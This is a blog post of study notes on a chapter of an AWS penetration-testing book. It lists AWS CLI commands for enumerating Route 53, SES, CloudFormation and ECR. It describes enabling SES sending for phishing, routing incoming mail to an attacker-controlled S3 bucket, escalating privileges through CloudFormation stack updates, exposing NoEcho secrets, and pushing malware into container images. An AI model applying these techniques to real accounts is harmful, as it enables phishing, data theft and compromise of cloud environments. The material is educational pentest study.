Book info – Hands-On AWS Penetration Testing with Kali Linux
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
Ch 14 is quite a bit of content covering different things. After the first read, I think it’s going to be a lab setup that is not necessarily practical given the lab build out done thus far.
Ch 14 – Targeting Other Services
AWS has lots of services, and thus lots of opportunities for exploitation. (Side note: Sometimes Black Hills Security will offer 4 hr free previews of their advanced training classes, I’ve got the Breaching the Cloud with Beau Bullock one on my to do list. The paid version is currently $395. From the previews I’ve done of other trainings, that’s a bargain.) Any of the services are an opportunity to look at how you would use them and then try to exploit common misconfigurations. This chapter will cover Route 53, Simple Email Service (SES), CloudFormation, and Elastic Container Registry. All new services to me, so if nothing else a good opportunity to get conceptual understanding of exploiting them.
Relates to DNS, unsurprisingly. There’s quite a bit you can do with Route 53, and it can be used for VPCs. So if you don’t have a domain to use, working through some of this within the lab VPC might be an option.
It’s valuable for recon to connect IPs and host names and find domains/sub-domains. Make sure that you give the profile you are using rights to work with Route53. You can pull down hosted zones with:
aws route53 list-hosted-zones --profile <profilename>
Probably nothing will be returned unless you’ve built things out. Then you can pull additional information about the records with:
aws route53 list-resource-record-sets --hosted-zone-id <hostedzoneid> --profile <profilename>
This will return resource record sets with name, type, time-to-live, and resource records. All types of DNS records could be returned – A records, CNAME records, MX records, etc. This can be compared to IP addresses found in other recon to help map out the environment you are exploring. You can also get info about the private hosted zones to gain info about the network internals.
The authors talk about the potential malicious attacks for Route 53, but they also indicate that these would be unlikely to be used in a pentest. One example would be changing the IPs associated with A records or CNAME records. But messing up DNS could cause major issues, so approach with caution.
You can register domains with Route 53, so it might be possible to add a new domain for the environment you are testing to create a website for a variety of purposes. The resolver info can also provide insight, but typically not an attack vector for pentesting.
Simple Email Service (SES)
The short description is it’s an email service. There’s a lot you can do with the SES service. It can be helpful for social engineering and recon. It will depend on the access you have. Phishing is an obvious attack vector. With SES access on your compromised creds, check for what you can find to use. This is another one you need to check the permissions on the profile you are using.
aws ses list-identities --region <region> --profile <profilename>
A set up and verified email means just that email is available. But when a domain is set up and verified, any email address across any subdomain can be used. Once found, verify sending is enabled:
aws ses get-account-sending-enabled --region <region> --profile <profilename>
Bear in mind that SES is not available in all regions, so you may end up with your SES in a different region than the rest of your lab set up. If you don’t have the sending option available, but do have the
ses:UpdateAccountSendingENabled permission, you can enable sending to use for phishing.
aws ses update-account-sending-enabled help --enabled --region <region> --profile <profilename>
The authors caution about using this option because sending may be disabled for a specific reason and enabling can break things. Once the ability to send is enabled, confirm with:
aws ses get-identity-verification-attributes --identities <email,domain,etc.> --region <region> --profile <profilename>
With a verified identity with sending enabled, it’s time to check the identity policy:
aws ses list-identity-policies --identity <email> --region <region> --profile <profilename>
If no policy names come back, no policies are applied, which means no restrictions and woohoo. When policies are returned, check on what the policies entail:
aws ses get-identity-policies --identity <email> --policy-name <policyname> --region <region> --profile <profilename>
The book demo returns a policy where permissions need to be escalated, which can be done by adding the ARN for the compromised user as a trusted principal. Alternatively you could add you own AWS account – SES supports cross-account email sending. That could definitely come in handy. Update SES policies with:
aws ses put-identity-policy --identity <email> --policy-name <policyname> --policy file://ses-policy-document.json
The last little piece is determining if the identity is in the SES sandbox, which restricts sending outside of the account’s list of verified emails/domains. There’s apparently not an easy way to check this from the CLI other than trying to send something, but you can check this from the web console. The restriction has to be manually lifted, so it’s likely been disabled if the account is using SES. To check in the console, go to the Sending Statistics page, go through the regions, and check to see if the account is in the sandbox for that region. Also check for templates already in the account because those would be handy for phishing.
aws ses list-templates region <region> --profile <profilename>
And then review the content:
aws ses get-template --template-name <templatename> --region <region> --profile <profilename>
Once you’ve gone through all the recon, use the
SendEmail API to start your phishing campaign. If templates are available, you can modify those using
UpdateTemplate to manipulate the content to go to a website you’ve set up or other attack vectors. You could also set up a rule to manipulate what happens with incoming emails using the
CreateReceiptRule to port messages over to an S3 bucket in your control. Using S3 buckets with SES is one of the things mentioned early in the SES documentation, so it looks to be fairly common. Once you have things coming over to the S3 bucket, you can check the content, set up Lambda functions, etc.
Lots to unpack with this. I think building out the service would be helpful. I’m looking at doing a buildout of Route 53 and SES, but I want to spend a bit more time getting a better understanding of the services.
Attacking all of CloudFormation
So CloudFormation lets you use code to provision resources – looks to be infrastructure as code. There’s a lot there from looking at the service page. I’m feeling like I need to just go back and learn the services covered in this chapter to get a handle on things, but the book examples give a solid overview of how to exploit things. The authors set up a LAMP stack for the demo.
To get info on the stacks:
aws cloudformation describe-stacks --region <region> --profile <profilename>
This will return a lot of info. Check out the parameters to see what’s there because it might include sensitive info. The best practice is to set
NoEcho to avoid passing sensitive info in the
DescribeStacks API. You would still be able to see the fields, but the value would be obfuscated. You might find password info, allowed SSH locations, etc. in the parameters, but I would think even with
NoEcho you would be able to gain some valuable insight.
Next up is the Outputs section. These are generated during stack creation and could also contain some helpful info like public endpoints. You might also find access info in the outputs section.
Info about termination protection might also be there (best practice is to turn it on). Specify the stack to check this:
aws cloudformation describe-stacks --stack-name <stackname> --region <region> --profile <profilename>
On to deleted stacks, because you can check out deleted stacks. That’s cool. From the console, you can use a dropdown to select deleted stacks. In the CLI, you have to just look through things.
aws cloudformation list-stacks --region <region> --profile <profilename>
Then look though the output for
DELETE_COMPLETE. To get details, you need to pass the stack to the command using the ARN for the stack name.
aws cloudformation describe-stacks --stack-name <arn> --region <region> --profile <profilename>
Deleted stacks are a good place to look for sensitive info in case a stack was deleted because it accidentally exposed info. Exports let you share values between stacks, so more info that can come in handy since it allows you see what info is available to each stack.
aws cloudformation list-exports --region <region> --profile <profilename>
Templates are used to create the stacks, which makes them an obvious thing you want to take a look at. Similarly to getting info about deleted stacks, you can specify the ARN to get details about the template.
aws cloudformation get-template --stack-name <name/ARN> --region <region> --profile <profilename>
This will return the JSON/YAML template used to generate the specified stack. Looking through the template is your best option to start. Scanning the template can also be helpful – the authors recommend cfripper and cfn_nag.
Roles can be passed when stacks are created, which results in the stack being created with that role. Without a passed role, the stack gets the current user privileges. Check the
DescribeStacks output for
RoleARN info to see if roles were passed. You can get resources created by the stack with:
aws cloudformation describe-stack-resources --stack-name <name/ARN> --region <region> --profile <profilename>
Try exploiting what you’ve found with
aws cloudformation update-stack --stack-name <name/ARN> --region <region> --template-body file://<file> --parameters file file://<file>
This can let you escalate your privileges by creating new resources with the passed roles’ permissions.
Cool tip to close out this section was the ability to get values for NoEcho parameters by updating the stack and changing the property value to false. Neat trick if you can use it. Just change something that won’t mess things up and update the stack. Then run
DescribeStack again to see what you can see.
Elastic Container Registry (ECR)
Basically Docker in AWS. Cool – need the account id to check out the service. You can pull this info with:
aws sts get-caller-identity
This would show up in CloudTrail and Rhino Security Labs has some scripts to avoid hitting CloudTrail. You can pull ECR info with:
aws ecr describe-repositories --region <region> --profile <profilename>
Pull the images with:
aws ecr list-images --repository-name <name> --region <region> --profile <profilename>
And pull the image down with:
$(aws ecr get-login --no-inlcude-email --region <region> --profile <profilename>)
That will return the Docker command to login and automatically execute it. If you see that the login succeeded, you can pull the image using Docker:
docker pull <imageinfo>
Run and drop into bash:
docker run -it --entrypoint /bin/bash <imageinfo>
And then use normal techniques to check things out. If those failed, try checking the repository policy:
aws ecr get-repository-policy --repository-name <name> --region <region> --profile <profilename>
With the right permissions, you can also try injecting malware and pushing an update with the malware. The authors recommends container analysis tools Anchor Engine and Clair as possibilities to statically analyze the containers.
That was a lot of material. And stuff that labbing is going to take some serious build-out. Good to know about these, and important to check out other services as well. Check all the things because you never know.
I feel like this was a good intro to these services and how to think about pentesting the various services offered by cloud providers. The process isn’t really any different, but it was interesting to see some services I haven’t used before. Really cool. And it’s got me curious what possibilities exist for pulling some of the logs over into Azure Sentinel. I know you can bring the logs in, and while I’ve just starting playing with Sentinel, I can see that being used to detect some of these methods in a way that might not have been readily available previously. You can shove AWS logs to other SIEMs as well (Elastic and Splunk look to both have decent docs based on a quick Google check) – I’m just thinking Sentinel because I’m playing with it and I think I could pull over the logs from my AWS environment into an Azure lab environment with Sentinel for a pretty reasonable cost and relatively low effort.